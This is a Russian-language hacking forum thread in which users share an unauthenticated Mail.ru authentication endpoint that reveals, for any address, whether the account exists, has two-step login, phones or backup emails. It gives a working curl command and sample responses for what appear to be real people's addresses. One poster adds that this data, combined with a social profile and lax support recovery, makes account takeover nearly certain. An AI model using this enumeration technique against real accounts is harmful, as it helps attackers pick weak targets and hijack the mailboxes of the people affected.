Mail(ру) мейл(ru)... wtf...

Discussion in 'Уязвимости Mail-сервисов' started by lifescore, 24 Jun 2021.

  1. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    630
    Likes Received:
    492
    Reputations:
    69
    Ну вроде бы и да, и вроде бы и нет. Ну вы поняли...

    хедеры придумаете если что

    https://auth.mail.ru/api/v1/pushauth/info

    login=salyaev.n@mail.ru

    Code:
    {
      "status": 200,
      "htmlencoded": true,
      "email": "salyaev.n@mail.ru",
      "body": {
        "exists": true,
        "twostep": false,
        "can_push": false,
        "alt_email": false,
        "phone": false,
        "trusted": false,
        "available": false,
        "auth": "password",
        "provider": "default",
        "webauthn": [],
        "phones": [],
        "alt_emails": []
      }
    }
     
  2. devton

    devton Elder - Старейшина

    Joined:
    26 Oct 2007
    Messages:
    3,380
    Likes Received:
    5,178
    Reputations:
    48
    зобавно...ровно 13 лет тому назад кодеры Рамблера той же хуйней страдали...история идет по спирали
    https://forum.antichat.ru/threads/73611/
     
    lifescore, crlf and Baskin-Robbins like this.
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    623
    Likes Received:
    1,278
    Reputations:
    399
    Кому-то Not Applicable влепили? :)

    Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но "... не получилось, не фартануло" :(

    Какие? Без шаманств всё работает:

    Code:
    curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq
    
    [​IMG]
    [​IMG]


    Забавно:
    [​IMG]
     
    Suicide, lifescore and Baskin-Robbins like this.
  4. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    630
    Likes Received:
    492
    Reputations:
    69
    Всех спалил?)

    С учетом как саппорт на recovery работал года два назад, мой мир профиль + эта инфа > 101% success

    Про себя не забыли :)
    Code:
    {
      "status": 403,
      "htmlencoded": true,
      "email": "root@mail.ru",
      "body": "forbidden"
    }
    чур не я

    9FBB0FA2-BB88-4794-92DA-97A446B084B3.jpeg
     
Loading...